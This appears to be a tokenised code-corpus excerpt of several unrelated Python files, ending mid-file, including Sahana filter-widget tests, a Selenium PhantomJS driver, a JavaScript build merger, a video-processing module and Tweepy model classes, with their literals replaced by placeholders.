<s> import unittest <EOL> from gluon import * <EOL> from s3 . s3filter import * <EOL> class S3FilterWidgetTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testInit ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = S3FilterWidget ( [ "<STR_LIT:name>" , "<STR_LIT>" ] , <EOL> option = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in widget . opts ) <EOL> self . assertTrue ( len ( widget . opts ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( widget . opts [ "<STR_LIT>" ] == "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in widget . attr ) <EOL> self . assertTrue ( len ( widget . attr ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( widget . attr [ "<STR_LIT>" ] == "<STR_LIT>" ) <EOL> def testRender ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = S3FilterWidget ( [ "<STR_LIT:name>" , "<STR_LIT>" ] ) <EOL> widget . widget = lambda resource , values : "<STR_LIT>" <EOL> resource = current . s3db . resource ( "<STR_LIT>" ) <EOL> output = widget ( resource , get_vars = { } ) <EOL> self . assertTrue ( isinstance ( output [ <NUM_LIT:0> ] , INPUT ) ) <EOL> attr = output [ <NUM_LIT:0> ] . attributes <EOL> t = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( t , "<STR_LIT>" ) <EOL> c = attr [ "<STR_LIT>" ] <EOL> self . assertTrue ( "<STR_LIT>" in c ) <EOL> self . assertTrue ( "<STR_LIT>" % widget . _class in c ) <EOL> i = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( i , "<STR_LIT>" % <EOL> ( resource . alias , widget . _class ) ) <EOL> v = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( v , "<STR_LIT>" ) <EOL> def testSelector ( self ) : <EOL> """<STR_LIT>""" <EOL> fields = "<STR_LIT:name>" <EOL> s3db = current . s3db <EOL> widget = S3FilterWidget ( ) <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , "<STR_LIT>" ) <EOL> widget . alias = "<STR_LIT>" <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , "<STR_LIT>" ) <EOL> widget . alias = None <EOL> fields = "<STR_LIT>" <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , None ) <EOL> fields = [ "<STR_LIT:name>" , "<STR_LIT>" ] <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , "<STR_LIT>" ) <EOL> fields = [ ] <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , None ) <EOL> def testVariable ( self ) : <EOL> """<STR_LIT>""" <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , None ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . assertEqual ( variable , [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> def testValues ( self ) : <EOL> """<STR_LIT>""" <EOL> get_vars = { "<STR_LIT>" : "<STR_LIT:1>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT:3>" ] } <EOL> values = S3FilterWidget . _values ( get_vars , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( "<STR_LIT:1>" in values ) <EOL> values = S3FilterWidget . _values ( get_vars , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:3> ) <EOL> self . assertTrue ( "<STR_LIT:1>" in values ) <EOL> self . assertTrue ( "<STR_LIT:2>" in values ) <EOL> self . assertTrue ( "<STR_LIT:3>" in values ) <EOL> def run_suite ( * test_classes ) : <EOL> """<STR_LIT>""" <EOL> loader = unittest . TestLoader ( ) <EOL> suite = unittest . TestSuite ( ) <EOL> for test_class in test_classes : <EOL> tests = loader . loadTestsFromTestCase ( test_class ) <EOL> suite . addTests ( tests ) <EOL> if suite is not None : <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> return <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_suite ( <EOL> S3FilterWidgetTests , <EOL> ) </s>
<s> import base64 <EOL> from selenium . webdriver . remote . command import Command <EOL> from selenium . webdriver . remote . remote_connection import RemoteConnection <EOL> from selenium . webdriver . remote . webdriver import WebDriver as RemoteWebDriver <EOL> from selenium . webdriver . common . desired_capabilities import DesiredCapabilities <EOL> from selenium . common . exceptions import WebDriverException <EOL> from selenium . webdriver . phantomjs . service import Service <EOL> class WebDriver ( RemoteWebDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , executable_path = "<STR_LIT>" , <EOL> port = <NUM_LIT:0> , desired_capabilities = DesiredCapabilities . PHANTOMJS , <EOL> service_args = None , service_log_path = None ) : <EOL> """<STR_LIT>""" <EOL> self . service = Service ( executable_path , port = port , <EOL> service_args = service_args , log_path = service_log_path ) <EOL> self . service . start ( ) <EOL> command_executor = self . service . service_url <EOL> try : <EOL> RemoteWebDriver . __init__ ( self , <EOL> command_executor = command_executor , <EOL> desired_capabilities = desired_capabilities ) <EOL> except : <EOL> self . quit ( ) <EOL> raise <EOL> self . _is_remote = False <EOL> self . command_executor = RemoteConnection ( command_executor , keep_alive = False ) <EOL> Command . EXECUTE_PHANTOM_SCRIPT = "<STR_LIT>" <EOL> self . command_executor . _commands [ Command . EXECUTE_PHANTOM_SCRIPT ] = ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> RemoteWebDriver . quit ( self ) <EOL> except : <EOL> pass <EOL> finally : <EOL> self . service . stop ( ) <EOL> def execute_phantomjs ( self , script , * args ) : <EOL> """<STR_LIT>""" <EOL> converted_args = list ( args ) <EOL> return self . execute ( Command . EXECUTE_PHANTOM_SCRIPT , <EOL> { '<STR_LIT>' : script , '<STR_LIT:args>' : converted_args } ) [ '<STR_LIT:value>' ] </s>
<s> import re <EOL> import os <EOL> import sys <EOL> SUFFIX_JAVASCRIPT = "<STR_LIT>" <EOL> RE_REQUIRE = "<STR_LIT>" <EOL> class SourceFile : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filepath , source ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . filepath = filepath <EOL> self . source = source <EOL> self . requiredBy = [ ] <EOL> def _getRequirements ( self ) : <EOL> """<STR_LIT>""" <EOL> return re . findall ( RE_REQUIRE , self . source ) <EOL> requires = property ( fget = _getRequirements , doc = "<STR_LIT>" ) <EOL> def usage ( filename ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" % filename <EOL> class Config : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> lines = [ line . strip ( ) <EOL> for line in open ( filename ) <EOL> if line . strip ( ) ] <EOL> self . forceFirst = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . forceLast = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . include = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . exclude = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : ] <EOL> def getFiles ( configDict , configFile = None ) : <EOL> cfg = None <EOL> if configFile : <EOL> cfg = Config ( configFile ) <EOL> allDirs = [ ] <EOL> for k , v in configDict . iteritems ( ) : <EOL> if not v in allDirs : <EOL> allDirs . append ( v ) <EOL> allFiles = [ ] <EOL> for sourceDirectory in allDirs : <EOL> for root , dirs , files in os . walk ( sourceDirectory ) : <EOL> for filename in files : <EOL> if filename . endswith ( SUFFIX_JAVASCRIPT ) and not filename . startswith ( "<STR_LIT:.>" ) : <EOL> filepath = os . path . join ( root , filename ) [ len ( sourceDirectory ) + <NUM_LIT:1> : ] <EOL> filepath = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if cfg and cfg . include : <EOL> if filepath in cfg . include or filepath in cfg . forceFirst : <EOL> allFiles . append ( filepath ) <EOL> elif ( not cfg ) or ( filepath not in cfg . exclude ) : <EOL> allFiles . append ( filepath ) <EOL> files = { } <EOL> order = [ ] <EOL> for filepath in allFiles : <EOL> if "<STR_LIT:\\>" in filepath : <EOL> filekey = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> elif "<STR_LIT:/>" in filepath : <EOL> filekey = filepath . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> else : <EOL> filekey = "<STR_LIT:.>" <EOL> fullpath = os . path . join ( configDict [ filekey ] , filepath ) <EOL> content = open ( fullpath , "<STR_LIT>" ) . read ( ) <EOL> files [ filepath ] = SourceFile ( filepath , content ) <EOL> from toposortmf import toposort <EOL> complete = False <EOL> resolution_pass = <NUM_LIT:1> <EOL> while not complete : <EOL> order = [ ] <EOL> nodes = [ ] <EOL> routes = [ ] <EOL> resolution_pass += <NUM_LIT:1> <EOL> for filepath , info in files . items ( ) : <EOL> nodes . append ( filepath ) <EOL> for neededFilePath in info . requires : <EOL> routes . append ( ( neededFilePath , filepath ) ) <EOL> for dependencyLevel in toposort ( nodes , routes ) : <EOL> for filepath in dependencyLevel : <EOL> order . append ( filepath ) <EOL> if not files . has_key ( filepath ) : <EOL> if "<STR_LIT:\\>" in filepath : <EOL> filekey = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> elif "<STR_LIT:/>" in filepath : <EOL> filekey = filepath . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> else : <EOL> filekey = "<STR_LIT:.>" <EOL> fullpath = os . path . join ( configDict [ filekey ] , filepath ) <EOL> content = open ( fullpath , "<STR_LIT>" ) . read ( ) <EOL> files [ filepath ] = SourceFile ( filepath , content ) <EOL> complete = True <EOL> try : <EOL> for fp in order : <EOL> if max ( [ order . index ( rfp ) for rfp in files [ fp ] . requires ] + <EOL> [ order . index ( fp ) ] ) != order . index ( fp ) : <EOL> complete = False <EOL> except : <EOL> complete = False <EOL> if cfg : <EOL> order = cfg . forceFirst + [ item <EOL> for item in order <EOL> if ( ( item not in cfg . forceFirst ) and <EOL> ( item not in cfg . forceLast ) ) ] + cfg . forceLast <EOL> return ( files , order ) <EOL> def run ( files , order , outputFilename = None ) : <EOL> result = [ ] <EOL> HEADER = "<STR_LIT>" + "<STR_LIT:=>" * <NUM_LIT> + "<STR_LIT>" + "<STR_LIT:U+0020>" + "<STR_LIT:=>" * <NUM_LIT> + "<STR_LIT>" <EOL> for fp in order : <EOL> f = files [ fp ] <EOL> result . append ( HEADER % f . filepath ) <EOL> source = f . source <EOL> result . append ( source ) <EOL> if not source . endswith ( "<STR_LIT:\n>" ) : <EOL> result . append ( "<STR_LIT:\n>" ) <EOL> if outputFilename : <EOL> open ( outputFilename , "<STR_LIT:w>" ) . write ( "<STR_LIT>" . join ( result ) ) <EOL> return "<STR_LIT>" . join ( result ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import getopt <EOL> options , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> try : <EOL> outputFilename = args [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> usage ( sys . argv [ <NUM_LIT:0> ] ) <EOL> raise SystemExit <EOL> else : <EOL> sourceDirectory = args [ <NUM_LIT:1> ] <EOL> if not sourceDirectory : <EOL> usage ( sys . argv [ <NUM_LIT:0> ] ) <EOL> raise SystemExit <EOL> configDict = { '<STR_LIT>' : sourceDirectory } <EOL> configFile = None <EOL> if options and options [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == "<STR_LIT:-c>" : <EOL> configFile = options [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> print "<STR_LIT>" % filename <EOL> run ( configDict , outputFilename , configFile ) </s>
<s> WEB2PY_PASSWD = "<STR_LIT>" <EOL> SERVER = "<STR_LIT>" <EOL> APPNAME = "<STR_LIT>" <EOL> BROWSER = "<STR_LIT>" <EOL> VALID_USER = "<STR_LIT>" <EOL> VALID_PASSWORD = "<STR_LIT>" <EOL> HTTP_PROXY = "<STR_LIT>" <EOL> NO_PROXY = "<STR_LIT>" <EOL> DELAY = <NUM_LIT:0> <EOL> ADMIN_EMAIL = "<STR_LIT>" <EOL> ADMIN_PASSWORD = "<STR_LIT>" </s>
<s> from web2py_env import local_import , db , gis_map_tables <EOL> test_utils = local_import ( "<STR_LIT>" ) <EOL> s3gis = local_import ( "<STR_LIT>" ) <EOL> gis_map_tables ( ) <EOL> InsertedRecord = test_utils . InsertedRecord <EOL> AddedRole = test_utils . AddedRole <EOL> ExpectedException = test_utils . ExpectedException <EOL> Change = test_utils . Change <EOL> ExpectSessionWarning = test_utils . ExpectSessionWarning <EOL> def check_scripts ( actual_output , scripts , request ) : <EOL> substitutions = dict ( application_name = request . application ) <EOL> for script in scripts : <EOL> script_string = "<STR_LIT>" % ( <EOL> script % substitutions <EOL> ) <EOL> assert script_string in actual_output <EOL> def layer_test ( <EOL> db , <EOL> layer_table , <EOL> layer_data , <EOL> data_structure_lhs , <EOL> data_structure_rhs , <EOL> session , <EOL> request , <EOL> check_output = None , <EOL> scripts = [ ] , <EOL> ) : <EOL> with InsertedRecord ( db , layer_table , layer_data ) : <EOL> with AddedRole ( session , session . s3 . system_roles . MAP_ADMIN ) : <EOL> actual_output = str ( <EOL> s3gis . GIS ( ) . show_map ( <EOL> window = True , <EOL> catalogue_toolbar = True , <EOL> toolbar = True , <EOL> search = True , <EOL> catalogue_layers = True , <EOL> projection = <NUM_LIT> , <EOL> ) <EOL> ) <EOL> def found ( data_structure ) : <EOL> test_utils . assert_equal ( <EOL> data_structure_rhs , data_structure <EOL> ) <EOL> substitutions = dict ( application_name = request . application ) <EOL> for script in scripts : <EOL> script_string = "<STR_LIT>" % ( <EOL> script % substitutions <EOL> ) <EOL> assert script_string in actual_output <EOL> if check_output : <EOL> check_output ( actual_output ) <EOL> test_utils . find_JSON_format_data_structure ( <EOL> actual_output , <EOL> data_structure_lhs , <EOL> found , <EOL> not_found = test_utils . not_found , <EOL> cannot_parse_JSON = test_utils . cannot_parse_JSON <EOL> ) </s>
<s> import json <EOL> import zmq <EOL> import pandas as pd <EOL> import pylab <EOL> def getstream ( address ) : <EOL> c = zmq . Context ( ) <EOL> s = c . socket ( zmq . SUB ) <EOL> s . setsockopt ( zmq . SUBSCRIBE , '<STR_LIT>' ) <EOL> s . connect ( address ) <EOL> while True : <EOL> yield s . recv ( ) <EOL> def populate ( df , n , stream ) : <EOL> m = df . shape [ <NUM_LIT:0> ] <EOL> while True : <EOL> next ( stream ) <EOL> j = next ( stream ) <EOL> d = json . loads ( j ) . get ( '<STR_LIT:data>' ) <EOL> if d : <EOL> df . loc [ df . shape [ <NUM_LIT:0> ] ] = d <EOL> if df . shape [ <NUM_LIT:0> ] >= n + m : <EOL> break <EOL> def plot_df ( df ) : <EOL> for i in range ( df . shape [ <NUM_LIT:1> ] ) : <EOL> pylab . subplot ( df . shape [ <NUM_LIT:1> ] , <NUM_LIT:1> , i + <NUM_LIT:1> ) <EOL> pylab . plot ( df [ i ] ) <EOL> pylab . show ( block = False ) <EOL> address = '<STR_LIT>' <EOL> df = pd . DataFrame ( columns = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> populate ( df , <NUM_LIT> , getstream ( address ) ) <EOL> plot_df ( df ) <EOL> import IPython <EOL> IPython . embed ( ) </s>
<s> from __future__ import with_statement <EOL> import logging <EOL> import os <EOL> import re <EOL> import shutil <EOL> from os . path import splitext <EOL> from . import image , utils <EOL> from . settings import get_thumb , Status <EOL> from . utils import call_subprocess , is_valid_html5_video <EOL> class SubprocessException ( Exception ) : <EOL> pass <EOL> def check_subprocess ( cmd , source , outname ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> try : <EOL> returncode , stdout , stderr = call_subprocess ( cmd ) <EOL> except KeyboardInterrupt : <EOL> logger . debug ( '<STR_LIT>' , outname ) <EOL> if os . path . isfile ( outname ) : <EOL> os . remove ( outname ) <EOL> raise <EOL> if returncode : <EOL> logger . debug ( '<STR_LIT>' , stdout ) <EOL> logger . debug ( '<STR_LIT>' , stderr ) <EOL> if os . path . isfile ( outname ) : <EOL> logger . debug ( '<STR_LIT>' , outname ) <EOL> os . remove ( outname ) <EOL> raise SubprocessException ( '<STR_LIT>' + source ) <EOL> def video_size ( source ) : <EOL> """<STR_LIT>""" <EOL> ret , stdout , stderr = call_subprocess ( [ '<STR_LIT>' , '<STR_LIT>' , source ] ) <EOL> pattern = re . compile ( r'<STR_LIT>' ) <EOL> match = pattern . search ( stderr ) <EOL> if match : <EOL> x , y = int ( match . groups ( ) [ <NUM_LIT:0> ] ) , int ( match . groups ( ) [ <NUM_LIT:1> ] ) <EOL> else : <EOL> x = y = <NUM_LIT:0> <EOL> return x , y <EOL> def generate_video ( source , outname , settings , options = None ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> w_src , h_src = video_size ( source ) <EOL> w_dst , h_dst = settings [ '<STR_LIT>' ] <EOL> logger . debug ( '<STR_LIT>' , w_src , h_src , w_dst , h_dst ) <EOL> base , src_ext = splitext ( source ) <EOL> base , dst_ext = splitext ( outname ) <EOL> if dst_ext == src_ext and w_src <= w_dst and h_src <= h_dst : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> shutil . copy ( source , outname ) <EOL> return <EOL> if h_dst * w_src < h_src * w_dst : <EOL> resize_opt = [ '<STR_LIT>' , "<STR_LIT>" % h_dst ] <EOL> else : <EOL> resize_opt = [ '<STR_LIT>' , "<STR_LIT>" % w_dst ] <EOL> if w_src <= w_dst and h_src <= h_dst : <EOL> resize_opt = [ ] <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , source , '<STR_LIT>' ] <EOL> if options is not None : <EOL> cmd += options <EOL> cmd += resize_opt + [ outname ] <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> check_subprocess ( cmd , source , outname ) <EOL> def generate_thumbnail ( source , outname , box , delay , fit = True , options = None ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> tmpfile = outname + "<STR_LIT>" <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , source , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , <EOL> '<STR_LIT>' , delay , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' , tmpfile ] <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> check_subprocess ( cmd , source , outname ) <EOL> image . generate_thumbnail ( tmpfile , outname , box , fit , options ) <EOL> os . unlink ( tmpfile ) <EOL> def process_video ( filepath , outpath , settings ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> filename = os . path . split ( filepath ) [ <NUM_LIT:1> ] <EOL> basename , ext = splitext ( filename ) <EOL> try : <EOL> if settings [ '<STR_LIT>' ] and is_valid_html5_video ( ext ) : <EOL> outname = os . path . join ( outpath , filename ) <EOL> utils . copy ( filepath , outname , symlink = settings [ '<STR_LIT>' ] ) <EOL> else : <EOL> valid_formats = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> video_format = settings [ '<STR_LIT>' ] <EOL> if video_format not in valid_formats : <EOL> logger . error ( '<STR_LIT>' , <EOL> valid_formats ) <EOL> raise ValueError <EOL> outname = os . path . join ( outpath , basename + '<STR_LIT:.>' + video_format ) <EOL> generate_video ( filepath , outname , settings , <EOL> options = settings . get ( video_format + '<STR_LIT>' ) ) <EOL> except Exception : <EOL> if logger . getEffectiveLevel ( ) == logging . DEBUG : <EOL> raise <EOL> else : <EOL> return Status . FAILURE <EOL> if settings [ '<STR_LIT>' ] : <EOL> thumb_name = os . path . join ( outpath , get_thumb ( settings , filename ) ) <EOL> try : <EOL> generate_thumbnail ( <EOL> outname , thumb_name , settings [ '<STR_LIT>' ] , <EOL> settings [ '<STR_LIT>' ] , fit = settings [ '<STR_LIT>' ] , <EOL> options = settings [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> if logger . getEffectiveLevel ( ) == logging . DEBUG : <EOL> raise <EOL> else : <EOL> return Status . FAILURE <EOL> return Status . SUCCESS </s>
<s> from tweepy1 . error import TweepError <EOL> from tweepy1 . utils import parse_datetime , parse_html_value , parse_a_href , parse_search_datetime , unescape_html <EOL> class ResultSet ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , max_id = None , since_id = None ) : <EOL> super ( ResultSet , self ) . __init__ ( ) <EOL> self . _max_id = max_id <EOL> self . _since_id = since_id <EOL> @ property <EOL> def max_id ( self ) : <EOL> if self . _max_id : <EOL> return self . _max_id <EOL> ids = self . ids ( ) <EOL> return max ( ids ) if ids else None <EOL> @ property <EOL> def since_id ( self ) : <EOL> if self . _since_id : <EOL> return self . _since_id <EOL> ids = self . ids ( ) <EOL> return min ( ids ) if ids else None <EOL> def ids ( self ) : <EOL> return [ item . id for item in self if hasattr ( item , '<STR_LIT:id>' ) ] <EOL> class Model ( object ) : <EOL> def __init__ ( self , api = None ) : <EOL> self . _api = api <EOL> def __getstate__ ( self ) : <EOL> pickle = dict ( self . __dict__ ) <EOL> try : <EOL> del pickle [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> return pickle <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def parse_list ( cls , api , json_list ) : <EOL> """<STR_LIT>""" <EOL> results = ResultSet ( ) <EOL> for obj in json_list : <EOL> if obj : <EOL> results . append ( cls . parse ( api , obj ) ) <EOL> return results <EOL> class Status ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> status = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT:user>' : <EOL> user_model = getattr ( api . parser . model_factory , '<STR_LIT:user>' ) <EOL> user = user_model . parse ( api , v ) <EOL> setattr ( status , '<STR_LIT>' , user ) <EOL> setattr ( status , '<STR_LIT:user>' , user ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( status , k , parse_datetime ( v ) ) <EOL> elif k == '<STR_LIT:source>' : <EOL> if '<STR_LIT:<>' in v : <EOL> setattr ( status , k , parse_html_value ( v ) ) <EOL> setattr ( status , '<STR_LIT>' , parse_a_href ( v ) ) <EOL> else : <EOL> setattr ( status , k , v ) <EOL> setattr ( status , '<STR_LIT>' , None ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( status , k , Status . parse ( api , v ) ) <EOL> elif k == '<STR_LIT>' : <EOL> if v is not None : <EOL> setattr ( status , k , Place . parse ( api , v ) ) <EOL> else : <EOL> setattr ( status , k , None ) <EOL> else : <EOL> setattr ( status , k , v ) <EOL> setattr ( status , '<STR_LIT>' , json ) <EOL> return status <EOL> def destroy ( self ) : <EOL> return self . _api . destroy_status ( self . id ) <EOL> def retweet ( self ) : <EOL> return self . _api . retweet ( self . id ) <EOL> def retweets ( self ) : <EOL> return self . _api . retweets ( self . id ) <EOL> def favorite ( self ) : <EOL> return self . _api . create_favorite ( self . id ) <EOL> class User ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> user = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT>' : <EOL> setattr ( user , k , parse_datetime ( v ) ) <EOL> elif k == '<STR_LIT:status>' : <EOL> setattr ( user , k , Status . parse ( api , v ) ) <EOL> elif k == '<STR_LIT>' : <EOL> if v is True : <EOL> setattr ( user , k , True ) <EOL> else : <EOL> setattr ( user , k , False ) <EOL> else : <EOL> setattr ( user , k , v ) <EOL> return user <EOL> @ classmethod <EOL> def parse_list ( cls , api , json_list ) : <EOL> if isinstance ( json_list , list ) : <EOL> item_list = json_list <EOL> else : <EOL> item_list = json_list [ '<STR_LIT>' ] <EOL> results = ResultSet ( ) <EOL> for obj in item_list : <EOL> results . append ( cls . parse ( api , obj ) ) <EOL> return results <EOL> def timeline ( self , ** kargs ) : <EOL> return self . _api . user_timeline ( user_id = self . id , ** kargs ) <EOL> def friends ( self , ** kargs ) : <EOL> return self . _api . friends ( user_id = self . id , ** kargs ) <EOL> def followers ( self , ** kargs ) : <EOL> return self . _api . followers ( user_id = self . id , ** kargs ) <EOL> def follow ( self ) : <EOL> self . _api . create_friendship ( user_id = self . id ) <EOL> self . following = True <EOL> def unfollow ( self ) : <EOL> self . _api . destroy_friendship ( user_id = self . id ) <EOL> self . following = False <EOL> def lists_memberships ( self , * args , ** kargs ) : <EOL> return self . _api . lists_memberships ( user = self . screen_name , * args , ** kargs ) <EOL> def lists_subscriptions ( self , * args , ** kargs ) : <EOL> return self . _api . lists_subscriptions ( user = self . screen_name , * args , ** kargs ) <EOL> def lists ( self , * args , ** kargs ) : <EOL> return self . _api . lists ( user = self . screen_name , * args , ** kargs ) <EOL> def followers_ids ( self , * args , ** kargs ) : <EOL> return self . _api . followers_ids ( user_id = self . id , * args , ** kargs ) <EOL> class DirectMessage ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> dm = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT>' or k == '<STR_LIT>' : <EOL> setattr ( dm , k , User . parse ( api , v ) ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( dm , k , parse_datetime ( v ) ) <EOL> else : <EOL> setattr ( dm , k , v ) <EOL> return dm <EOL> def destroy ( self ) : <EOL> return self . _api . destroy_direct_message ( self . id ) <EOL> class Friendship ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> relationship = json [ '<STR_LIT>' ] <EOL> source = cls ( api ) <EOL> for k , v in relationship [ '<STR_LIT:source>' ] . items ( ) : <EOL> setattr ( source , k , v ) <EOL> target = cls ( api ) <EOL> for k , v in relationship [ '<STR_LIT:target>' ] . items ( ) : <EOL> setattr ( target , k , v ) <EOL> return source , target <EOL> class Category ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> category = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> setattr ( category , k , v ) <EOL> return category <EOL> class SavedSearch ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> ss = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT>' : <EOL> setattr ( ss , k , parse_datetime ( v ) ) <EOL> else : <EOL> setattr ( ss , k , v ) <EOL> return ss <EOL> def destroy ( self ) : <EOL> return self . _api . destroy_saved_search ( self . id ) <EOL> class SearchResults ( ResultSet ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> metadata = json [ '<STR_LIT>' ] <EOL> results = SearchResults ( metadata . get ( '<STR_LIT>' ) , metadata . get ( '<STR_LIT>' ) ) <EOL> results . refresh_url = metadata . get ( '<STR_LIT>' ) <EOL> results . completed_in = metadata . get ( '<STR_LIT>' ) <EOL> results . query = metadata . get ( '<STR_LIT>' ) <EOL> for status in json [ '<STR_LIT>' ] : <EOL> results . append ( Status . parse ( api , status ) ) <EOL> return results <EOL> class List ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> lst = List ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT:user>' : <EOL> setattr ( lst , k , User . parse ( api , v ) ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( lst , k , parse_datetime ( v ) ) <EOL> else : <EOL> setattr ( lst , k , v ) <EOL> return lst <EOL> @ classmethod <EOL> def parse_list ( cls , api , json_list , result_set = None ) : <EOL> results = ResultSet ( ) <EOL> if isinstance ( json_list , dict ) : <EOL> json_list = json_list [ '<STR_LIT>' ] <EOL> for obj in json_list : <EOL> results . append ( cls . parse ( api , obj ) ) <EOL> return results <EOL> def update ( self , ** kargs ) : <EOL> return self . _api . update_list ( self . slug , ** kargs ) <EOL> def destroy ( self ) : <EOL> return self . _api . destroy_list ( self . slug ) <EOL> def timeline ( self , ** kargs ) : <EOL> return self . _api . list_timeline ( self . user . screen_name , self . slug , ** kargs ) <EOL> def add_member ( self , id ) : <EOL> return self . _api . add_list_member ( self . slug , id ) <EOL> def remove_member ( self , id ) : <EOL> return self . _api . remove_list_member ( self . slug , id ) <EOL> def members ( self , ** kargs ) : <EOL> return self . _api . list_members ( self . user . screen_name , self . slug , ** kargs ) <EOL> def is_member ( self , id ) : <EOL> return self . _api . is_list_member ( self . user . screen_name , self . slug , id ) <EOL> def subscribe ( self ) : <EOL> return self . _api . subscribe_list ( self . user . screen_name , self 